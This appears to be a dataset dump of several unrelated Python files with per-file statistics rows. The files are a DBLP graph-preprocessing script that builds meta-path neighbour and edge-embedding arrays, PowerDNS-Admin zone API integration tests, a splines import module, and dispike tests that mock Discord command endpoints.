        # edge_neigh_result=[]
        # edge_idx_result=[]
        # for e,neigh in enumerate(edge_neigh):
        #     neigh = np.asarray(neigh)
        #     idx = np.random.choice(neigh.shape[0], max_len)
        #     edge_neigh_result.append(neigh[idx,0])
        #     edge_idx_result.append(neigh[idx,1])
        # edge_neigh = np.vstack(edge_neigh_result)
        # edge2node = np.vstack(edge_idx_result)
        # edge_neighs[s] = edge_neigh
        node_neighs[s] = node_neigh
        node2edge_idxs[s] = edge_idx
        edge_embs[s] =edge_emb
        # edge2node_idxs[s] = edge2node
        edge_node_adjs[s] = edge_node_adj
    # np.savez("{}edge_neighs_{}_{}.npz".format(path,K,out_dims),
    #          APA=edge_neighs['APA'], APAPA=edge_neighs['APAPA'], APCPA=edge_neighs['APCPA'])
    # print('dump npz file {}edge_neighs.npz complete'.format(path))
    np.savez("{}node_neighs_{}_{}.npz".format(path,K,out_dims),
             APA=node_neighs['APA'], APAPA=node_neighs['APAPA'], APCPA=node_neighs['APCPA'])
    print('dump npz file {}node_neighs.npz complete'.format(path))
    np.savez("{}node2edge_idxs_{}_{}.npz".format(path,K,out_dims),
             APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
    print('dump npz file {}node2edge_idxs.npz complete'.format(path))
    np.savez("{}edge_embs_{}_{}.npz".format(path,K,out_dims),
             APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
    print('dump npz file {}edge_embs.npz complete'.format(path))
    # np.savez("{}edge2node_idxs_{}_{}.npz".format(path,K,out_dims),
    #          APA=edge2node_idxs['APA'], APAPA=edge2node_idxs['APAPA'], APCPA=edge2node_idxs['APCPA'])
    # print('dump npz file {}edge2node_idxs.npz complete'.format(path))
    np.savez("{}edge_node_adjs_{}_{}.npz".format(path, K,out_dims),
             APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
    print('dump npz file {}edge_node_adjs.npz complete'.format(path))
    pass
def gen_edge_adj_random(path='data/dblp2/', ps=True,edge_dim=66):
    """
    Variant of gen_edge_adj where K is not a parameter: it is set to the
    maximum nonzero degree over all schemes, so no neighbor list is ever
    truncated (shorter lists are upsampled by random repetition).

    Args:
        path: data directory.
        ps: rank neighbors by PathSim (*_ps.npz) if True, else by raw
            metapath counts.
        edge_dim: edge-record width passed to load_edge_emb.

    Returns:
        None; writes node2edge_idxs_*, edge_embs_* and edge_node_adjs_*
        npz files in *path* (node_neighs are not saved in this variant).
    """
    PA_file = "PA"
    PC_file = "PC"
    PT_file = "PT"
    # print("{}{}.txt".format(path, PA_file))
    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)
    PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
                       dtype=np.int32)
    # ids in the text files are 1-based
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1
    PT[:, 0] -= 1
    PT[:, 1] -= 1
    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1
    conf_max = max(PC[:,1])+1
    term_max = max(PT[:, 1]) + 1
    PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
                       shape=(paper_max, author_max),
                       dtype=np.int32)
    PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
                       shape=(paper_max, term_max),
                       dtype=np.int32)
    PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
                       shape=(paper_max, conf_max),
                       dtype=np.int32)
    if ps:
        # rank neighbors by precomputed PathSim scores
        APA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APA_ps.npz'))).to_dense()
        APAPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APAPA_ps.npz'))).to_dense()
        APCPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APCPA_ps.npz'))).to_dense()
        adj = {'APA':APA_ps,'APAPA':APAPA_ps,'APCPA':APCPA_ps}
    else:
        # rank neighbors by raw metapath path counts
        APA = (PA.transpose() * PA)
        APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
        APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
        APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
        adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
    # select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
    schemes = ['APA','APAPA','APCPA']#
    index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
    node_neighs={}
    edge_neighs={}
    node2edge_idxs={}
    edge_embs={}
    edge2node_idxs={}
    edge_node_adjs={}
    # K is chosen as the maximum nonzero degree over all schemes
    max_degree=0
    for s in schemes:
        aa = adj[s]
        degree = aa.shape[1]-(aa ==0).sum(dim=1)
        max_degree=max(max_degree,torch.max(degree).item())
    print('max degree ',max_degree)
    K=max_degree
    for s in schemes:
        print('----{}----'.format(s))
        aa = adj[s]
        #count nonzero degree
        degree = aa.shape[1]-(aa ==0).sum(dim=1)
        print('min degree ',torch.min(degree))
        degree = degree.numpy()
        # sort each row by descending similarity
        ind = torch.argsort(aa,dim=1)
        ind = torch.flip(ind,dims=[1])
        # top-K neighbors per row; rows with degree < K are padded by
        # randomly resampling from their real neighbors
        node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
                                else torch.cat(
            [ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
                                for i in range(ind.shape[0])]
                               , dim=0)
        print("node_neigh.shape ",node_neigh.shape)
        mp_index = (index[s]).to_dense()
        # print(mp_index)
        # drop the pathsim and count columns; keep only the embedding part
        mp_edge = emb[s][:,:-2]
        out_dims = mp_edge.shape[1]
        # edge id for every (node, neighbor) pair (0 means "no edge")
        edge_idx_old = mp_index[
            torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1),
            node_neigh.contiguous().view(-1)]
        print("edge_idx_old.shape ",edge_idx_old.shape)
        # densely re-number only the edges that are actually used
        old2new=dict()
        new2old=dict()
        for e in edge_idx_old.numpy():
            if e not in old2new:
                old2new[e]=len(old2new)
                new2old[old2new[e]]=e
        assert len(old2new)==len(new2old)
        print('number of unique edges ', len(old2new))
        new_embs = [ new2old[i] for i in range(len(old2new))]
        new_embs = mp_edge[new_embs]
        edge_idx = torch.LongTensor( [old2new[i] for i in edge_idx_old.numpy()]).view(-1,K)
        edge_emb = new_embs
        uq = torch.unique(edge_idx.view(-1),return_counts=True)[1]
        print ('max number of neighbors ', max(uq))
        #edge->node adj
        edge_node_adj = [[]for _ in range(len(old2new))]
        for i in range(edge_idx.shape[0]):
            for j in range(edge_idx.shape[1]):
                edge_node_adj[ edge_idx.numpy()[i,j] ].append(i)
        edge_node_adj = [np.unique(i) for i in edge_node_adj]
        # pad single-endpoint edges by repeating the endpoint
        edge_node_adj = np.array([xi if len(xi)==2 else [xi[0],xi[0]] for xi in edge_node_adj])
        # print(max(map(len, edge_node_adj)))
        # edge_node_adj = np.array(edge_node_adj)
        print('edge_node_adj.shape ', edge_node_adj.shape)
        # #edges of line graph
        # line_graph_edges = torch.cat( [edge_idx.repeat_interleave(K).reshape(-1,1), edge_idx.repeat(K,1).reshape(-1,1),
        #                                torch.arange(node_neigh.shape[0]).repeat_interleave(K*K).view(-1,1)],dim=1).numpy()
        # assert line_graph_edges.shape[1]==3
        # print("line_graph_edges.shape ", line_graph_edges.shape)  # [edge1, edge2, node ]
        # #construct line graph
        # import pandas as pd
        # df = pd.DataFrame(line_graph_edges)
        # edge_neigh = df.groupby(0)[1,2].apply(pd.Series.tolist) #group by edge1; [ [e2,n], .. ]
        # max_len = max([len(i) for i in edge_neigh ])
        # edge_neigh_result=[]
        # edge_idx_result=[]
        # for e,neigh in enumerate(edge_neigh):
        #     neigh = np.asarray(neigh)
        #     idx = np.random.choice(neigh.shape[0], max_len)
        #     edge_neigh_result.append(neigh[idx,0])
        #     edge_idx_result.append(neigh[idx,1])
        # edge_neigh = np.vstack(edge_neigh_result)
        # edge2node = np.vstack(edge_idx_result)
        # edge_neighs[s] = edge_neigh
        # node_neighs[s] = node_neigh
        node2edge_idxs[s] = edge_idx
        edge_embs[s] =edge_emb
        # edge2node_idxs[s] = edge2node
        edge_node_adjs[s] = edge_node_adj
    # np.savez("{}edge_neighs_{}_{}.npz".format(path,K,out_dims),
    #          APA=edge_neighs['APA'], APAPA=edge_neighs['APAPA'], APCPA=edge_neighs['APCPA'])
    # print('dump npz file {}edge_neighs.npz complete'.format(path))
    # np.savez("{}node_neighs_{}_{}.npz".format(path,K,out_dims),
    #          APA=node_neighs['APA'], APAPA=node_neighs['APAPA'], APCPA=node_neighs['APCPA'])
    # print('dump npz file {}node_neighs.npz complete'.format(path))
    np.savez("{}node2edge_idxs_{}_{}.npz".format(path,K,out_dims),
             APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
    print('dump npz file {}node2edge_idxs.npz complete'.format(path))
    np.savez("{}edge_embs_{}_{}.npz".format(path,K,out_dims),
             APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
    print('dump npz file {}edge_embs.npz complete'.format(path))
    # np.savez("{}edge2node_idxs_{}_{}.npz".format(path,K,out_dims),
    #          APA=edge2node_idxs['APA'], APAPA=edge2node_idxs['APAPA'], APCPA=edge2node_idxs['APCPA'])
    # print('dump npz file {}edge2node_idxs.npz complete'.format(path))
    np.savez("{}edge_node_adjs_{}_{}.npz".format(path, K,out_dims),
             APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
    print('dump npz file {}edge_node_adjs.npz complete'.format(path))
    pass
def gen_edge_sim_adj(path='data/dblp2', K=80,edge_dim=66,sim='cos'):
    """Build a fixed-size (K) neighbourhood for every author node over the
    DBLP meta-paths APA / APAPA / APCPA, attach an embedding to every
    (node, neighbour) edge, and dump the results to ``.npz`` archives.

    Args:
        path: directory prefix holding PA.txt / PC.txt / PT.txt and the
            pretrained meta-path embedding files.
        K: number of neighbours kept per node (truncate if a node has more,
            resample with replacement if it has fewer).
        edge_dim: stored edge-embedding width; the last 2 columns of the
            embedding files are bookkeeping, hence ``emb_len=edge_dim-2``.
        sim: neighbour-ranking measure. 'cos' -> cosine similarity of
            meta-path adjacency rows; anything else -> raw path counts.

    Returns:
        None. Side effects only: writes ``node2edge_idxs``, ``edge_embs``
        and ``edge_node_adjs`` npz files under ``path``.
    """
    # Pretrained node embeddings per meta-path (APAPA reuses the APA file).
    APA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APA',emb_len=edge_dim-2)
    APCPA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APCPA',emb_len=edge_dim-2)
    PA_file = "PA"
    PC_file = "PC"
    PT_file = "PT"
    # print("{}{}.txt".format(path, PA_file))
    # Raw bipartite edge lists: paper-author, paper-conference, paper-term.
    PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
                       dtype=np.int32)
    PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
                       dtype=np.int32)
    PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
                       dtype=np.int32)
    # Input ids are 1-based; shift everything to 0-based indices.
    PA[:, 0] -= 1
    PA[:, 1] -= 1
    PC[:, 0] -= 1
    PC[:, 1] -= 1
    PT[:, 0] -= 1
    PT[:, 1] -= 1
    paper_max = max(PA[:, 0]) + 1
    author_max = max(PA[:, 1]) + 1
    conf_max = max(PC[:,1])+1
    term_max = max(PT[:, 1]) + 1
    # Sparse incidence matrices: papers x {authors, terms, conferences}.
    PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
                       shape=(paper_max, author_max),
                       dtype=np.int32)
    PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
                       shape=(paper_max, term_max),
                       dtype=np.int32)
    PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
                       shape=(paper_max, conf_max),
                       dtype=np.int32)
    if sim=='cos':
        from sklearn.metrics.pairwise import cosine_similarity
        # s = cosine_similarity(self.emd, self.emd) # dense output
        # Meta-path adjacency: APA = PA^T * PA counts co-authored papers;
        # rank neighbours by cosine similarity of those count vectors.
        APA = (PA.transpose() * PA)
        APAPA = torch.from_numpy(cosine_similarity(APA * APA))
        APA = torch.from_numpy(cosine_similarity(APA))
        APCPA = torch.from_numpy(cosine_similarity(PA.transpose() * PC * PC.transpose() * PA))
        adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
    else:
        # Rank neighbours by the raw (integer) meta-path counts instead.
        APA = (PA.transpose() * PA)
        APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
        APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
        APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
        adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
    # select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
    schemes = ['APA','APAPA','APCPA']#
    index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
    node_emb={'APA':APA_e,'APAPA':APA_e,'APCPA':APCPA_e,}
    node_neighs={}
    edge_neighs={}
    node2edge_idxs={}
    edge_embs={}
    edge2node_idxs={}
    edge_node_adjs={}
    for s in schemes:
        print('----{}----'.format(s))
        aa = adj[s]
        ne = node_emb[s]
        #count nonzero degree
        degree = aa.shape[1]-(aa ==0).sum(dim=1)
        print('min degree ',torch.min(degree))
        degree = degree.numpy()
        # Sort each node's neighbours by similarity, descending.
        ind = torch.argsort(aa,dim=1)
        ind = torch.flip(ind,dims=[1])
        # Exactly K neighbours per node: truncate when degree >= K, otherwise
        # pad by resampling (with replacement) from the real neighbours.
        node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
                                else torch.cat(
                                    [ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
                                for i in range(ind.shape[0])]
                               , dim=0)
        print("node_neigh.shape ",node_neigh.shape)
        mp_index = (index[s]).to_dense()
        # print(mp_index)
        mp_edge = (emb[s][:,:-2])
        out_dims = mp_edge.shape[1]
        # Unfold (node, k-th-neighbour) pairs into a flat (N*K, 2) list.
        edge_idx_unfold = torch.cat([
            torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1,1),
            node_neigh.contiguous().view(-1,1)],dim=1) #shape(-1,2)
        print("edge_idx_unfold.shape ",edge_idx_unfold.shape)
        # max_edge = mp_index.max()
        # Deduplicate undirected edges via a symmetric integer hash
        # n1*N+n2 / n2*N+n1; both orientations map to one embedding slot.
        edgeHash2emb = dict()
        edge2node=[]
        new_embs = []
        edge_idx_new = []
        n_counter = 0
        # counter = 0
        for e in edge_idx_unfold.numpy():
            n1=e[0]
            n2=e[1]
            edge_hash1 = n1*node_neigh.shape[0]+n2
            edge_hash2 = n2*node_neigh.shape[0]+n1
            if edge_hash1 in edgeHash2emb or edge_hash2 in edgeHash2emb:
                # Both hashes are always registered together below, so
                # edge_hash1 is present whenever edge_hash2 is.
                edge_idx_new.append(edgeHash2emb[edge_hash1])
            else:
                edgeHash2emb[edge_hash1] = len(new_embs)
                edgeHash2emb[edge_hash2] = len(new_embs)
                edge_idx_new.append(len(new_embs))
                edge2node.append([n1,n2])
                edge_id = mp_index[n1][n2]
                if edge_id==0:
                    #no edge between
                    # No precomputed embedding for this pair: fall back to
                    # the mean of the two endpoint embeddings.
                    new_embs.append((ne[n1]+ne[n2])/2)
                    n_counter += 1
                    # edge_idx_old.append(len(edge_idx_old)+max_edge)
                else:
                    new_embs.append(mp_edge[edge_id])
        print('number of empty edges ', n_counter)
        print('number of edges ', len(new_embs))
        edge_idx = np.array(edge_idx_new).reshape(-1,K)
        print('edge_idx.shape ', edge_idx.shape)
        edge_emb = np.vstack(new_embs)
        print('edge_emb.shape ', edge_emb.shape)
        edge_node_adj = np.array(edge2node)
        print('edge_node_adj.shape ', edge_node_adj.shape)
        node2edge_idxs[s] = edge_idx
        edge_embs[s] =edge_emb
        edge_node_adjs[s] = edge_node_adj
    # Persist one array per meta-path in each npz archive.
    np.savez("{}node2edge_idxs_{}_{}_cos.npz".format(path,K,out_dims),
             APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
    print('dump npz file {}node2edge_idxs2.npz complete'.format(path))
    np.savez("{}edge_embs_{}_{}_cos.npz".format(path,K,out_dims),
             APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
    print('dump npz file {}edge_embs2.npz complete'.format(path))
    np.savez("{}edge_node_adjs_{}_{}_cos.npz".format(path, K,out_dims),
             APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
    print('dump npz file {}edge_node_adjs2.npz complete'.format(path))
    pass
if __name__ == '__main__':
    # Entry point: each call below is one preprocessing stage for the DBLP
    # dataset; uncomment the stage(s) to (re)generate its outputs.
    # Currently only the random-walk corpus generation is enabled.
    #clean_dblp()
    #gen_homograph()
    # dump_edge_emb(emb_len=128)
    #gen_homoadj()
    gen_walk(path='../data/dblp2/')
    # gen_edge_adj(K=5,path='../data/dblp2/', edge_dim=130)
    # gen_edge_sim_adj(path='../data/dblp2/', K=10,edge_dim=18,sim='cos')
| 35.176007 | 127 | 0.525155 | 5,696 | 40,171 | 3.533708 | 0.055302 | 0.040242 | 0.019674 | 0.023996 | 0.798837 | 0.769277 | 0.744684 | 0.729829 | 0.716862 | 0.696542 | 0 | 0.02937 | 0.304971 | 40,171 | 1,141 | 128 | 35.206836 | 0.691404 | 0.19422 | 0 | 0.727763 | 0 | 0 | 0.073933 | 0.009897 | 0 | 0 | 0 | 0 | 0.002695 | 1 | 0.016173 | false | 0.006739 | 0.009434 | 0 | 0.030997 | 0.057951 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9090ed6ab07eeed90a7c670b5593260c071f646a | 3,298 | py | Python | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 1,431 | 2015-12-13T11:10:33.000Z | 2021-12-08T03:12:01.000Z | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 954 | 2015-12-30T17:08:47.000Z | 2021-12-10T21:32:00.000Z | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 625 | 2016-01-05T07:44:22.000Z | 2021-12-10T08:54:29.000Z | import json
from collections import namedtuple
from powerdnsadmin.lib.validators import validate_zone
from powerdnsadmin.lib.schema import DomainSchema
from tests.fixtures import client
from tests.fixtures import zone_data, initial_apikey_data
from tests.fixtures import admin_apikey_integration
class TestIntegrationApiZoneAdminApiKey(object):
    """Integration tests for the zone API when authenticated with an
    administrator API key: listing, creating and deleting zones."""

    ZONES_URL = "/api/v1/servers/localhost/zones"

    def _create_zone(self, client, zone_data, headers):
        # POST a new zone, validate the returned zone document, expect 201.
        res = client.post(self.ZONES_URL,
                          headers=headers,
                          data=json.dumps(zone_data),
                          content_type="application/json")
        payload = res.get_json(force=True)
        payload['rrsets'] = []
        validate_zone(payload)
        assert res.status_code == 201
        return res

    def _delete_zone(self, client, zone_data, headers):
        # DELETE the zone created from zone_data, expect 204 (no content).
        zone_url = "{0}/{1}".format(self.ZONES_URL, zone_data['name'].rstrip("."))
        res = client.delete(zone_url, headers=headers)
        assert res.status_code == 204

    def test_empty_get(self, client, initial_apikey_data,
                       admin_apikey_integration):
        """With no zones created, listing zones returns an empty array."""
        res = client.get(self.ZONES_URL, headers=admin_apikey_integration)
        payload = res.get_json(force=True)
        assert res.status_code == 200
        assert payload == []

    def test_create_zone(self, client, initial_apikey_data, zone_data,
                         admin_apikey_integration):
        """A zone can be created and subsequently removed."""
        self._create_zone(client, zone_data, admin_apikey_integration)
        self._delete_zone(client, zone_data, admin_apikey_integration)

    def test_get_multiple_zones(self, client, initial_apikey_data, zone_data,
                                admin_apikey_integration):
        """A created zone shows up in the listing and serializes cleanly
        through DomainSchema."""
        self._create_zone(client, zone_data, admin_apikey_integration)
        res = client.get(self.ZONES_URL, headers=admin_apikey_integration)
        listing = res.get_json(force=True)
        # Rehydrate the first entry as an object so the schema can dump it.
        fake_domain = namedtuple("Domain", listing[0].keys())(*listing[0].values())
        domain_schema = DomainSchema(many=True)
        json.dumps(domain_schema.dump([fake_domain]))
        assert res.status_code == 200
        self._delete_zone(client, zone_data, admin_apikey_integration)

    def test_delete_zone(self, client, initial_apikey_data, zone_data,
                         admin_apikey_integration):
        """Deleting a previously created zone returns 204."""
        self._create_zone(client, zone_data, admin_apikey_integration)
        self._delete_zone(client, zone_data, admin_apikey_integration)
| 40.219512 | 77 | 0.625834 | 378 | 3,298 | 5.203704 | 0.166667 | 0.052872 | 0.145399 | 0.085409 | 0.760041 | 0.725979 | 0.712761 | 0.712761 | 0.712761 | 0.712761 | 0 | 0.01541 | 0.271983 | 3,298 | 81 | 78 | 40.716049 | 0.803832 | 0 | 0 | 0.75 | 0 | 0 | 0.105215 | 0.078836 | 0 | 0 | 0 | 0 | 0.140625 | 1 | 0.0625 | false | 0 | 0.109375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
90b744ac6c075f335319499ea0755b71b43f6918 | 297 | py | Python | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 199 | 2020-03-31T22:45:31.000Z | 2022-03-18T14:57:23.000Z | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 4 | 2020-04-04T18:45:33.000Z | 2022-01-05T03:16:07.000Z | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 25 | 2020-04-01T11:04:11.000Z | 2022-03-30T17:21:44.000Z | from .linear import linear_spline, unconstrained_linear_spline
from .quadratic import quadratic_spline, unconstrained_quadratic_spline
from .cubic import cubic_spline, unconstrained_cubic_spline
from .rational_quadratic import rational_quadratic_spline, unconstrained_rational_quadratic_spline
| 37.125 | 98 | 0.895623 | 35 | 297 | 7.171429 | 0.228571 | 0.302789 | 0.223108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077441 | 297 | 7 | 99 | 42.428571 | 0.916058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
90c8a26e2ae9f8196fa5502881d38fe00f52cc82 | 12,919 | py | Python | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | from dispike.register.models.options import (
CommandChoice,
CommandOption,
CommandTypes,
DiscordCommand,
)
from httpx import Response
from dispike.models.incoming import IncomingApplicationCommand
from dispike import Dispike
from pydantic import ValidationError
import pytest
from dispike.errors.network import DiscordAPIError
from nacl.encoding import HexEncoder
from nacl.signing import SigningKey
import respx
@pytest.fixture
def dispike_object():
    """Build a Dispike client wired to a freshly generated Ed25519 key."""
    signing_key = SigningKey.generate()
    public_key = signing_key.verify_key.encode(encoder=HexEncoder).decode()
    return Dispike(
        client_public_key=public_key,
        bot_token="BOTTOKEN",
        application_id="APPID",
    )
@respx.mock
def test_get_commands_globally_call_successful(dispike_object: Dispike):
    """A 200 from the global commands endpoint is parsed into one
    IncomingApplicationCommand per returned command."""
    mock_commands = [
        {
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "description": "McCoolbot is the coolest bot around.",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            "id": "3344",
            "application_id": "7890",
            "name": "mccoolbotv2",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get("https://discord.com/api/v8/applications/APPID/commands").mock(
        return_value=Response(200, json=mock_commands)
    )
    fetched = dispike_object.get_commands()
    for command in fetched:
        assert isinstance(command, IncomingApplicationCommand)
    assert len(fetched) == 2
@respx.mock
def test_get_commands_globally_call_fail(dispike_object: Dispike):
    """A 500 from the global commands endpoint raises DiscordAPIError,
    regardless of the response body."""
    body = [
        {
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "description": "McCoolbot is the coolest bot around.",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            "id": "3344",
            "application_id": "7890",
            "name": "mccoolbotv2",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get("https://discord.com/api/v8/applications/APPID/commands").mock(
        return_value=Response(500, json=body)
    )
    with pytest.raises(DiscordAPIError):
        dispike_object.get_commands()
@respx.mock
def test_get_commands_globally_call_invalid_incoming(dispike_object: Dispike):
    """A 200 whose payload is missing required fields (name / description)
    fails pydantic validation with ValidationError."""
    malformed = [
        {
            # missing "description"
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            # missing "name"
            "id": "3344",
            "application_id": "7890",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get("https://discord.com/api/v8/applications/APPID/commands").mock(
        return_value=Response(200, json=malformed)
    )
    with pytest.raises(ValidationError):
        dispike_object.get_commands()
@respx.mock
def test_get_commands_guild_only_call_successful(dispike_object: Dispike):
    """A 200 from the guild commands endpoint is parsed into one
    IncomingApplicationCommand per returned command."""
    mock_commands = [
        {
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "description": "McCoolbot is the coolest bot around.",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            "id": "3344",
            "application_id": "7890",
            "name": "mccoolbotv2",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
    ).mock(return_value=Response(200, json=mock_commands))
    fetched = dispike_object.get_commands(
        guild_only=True, guild_id_passed="EXAMPLE_GUILD"
    )
    for command in fetched:
        assert isinstance(command, IncomingApplicationCommand)
    assert len(fetched) == 2
@respx.mock
def test_get_commands_guild_only_call_fail(dispike_object: Dispike):
    """A 404 from the guild commands endpoint raises DiscordAPIError,
    regardless of the response body."""
    body = [
        {
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "description": "McCoolbot is the coolest bot around.",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            "id": "3344",
            "application_id": "7890",
            "name": "mccoolbotv2",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get(
        "https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
    ).mock(return_value=Response(404, json=body))
    with pytest.raises(DiscordAPIError):
        dispike_object.get_commands(
            guild_only=True, guild_id_passed="EXAMPLE_GUILD"
        )
@respx.mock
def test_get_commands_guild_only_call_invalid_incoming(dispike_object: Dispike):
    """A 200 from the guild endpoint with fields missing (name /
    description) fails pydantic validation with ValidationError."""
    malformed = [
        {
            # missing "description"
            "id": "1234",
            "application_id": "7890",
            "name": "mccoolbotv1",
            "options": [
                {"type": 6, "name": "wave", "description": "wave at a person"}
            ],
        },
        {
            # missing "name"
            "id": "3344",
            "application_id": "7890",
            "description": "send a message",
            "options": [
                {"type": 3, "name": "message", "description": "send a message"}
            ],
        },
    ]
    respx.get(
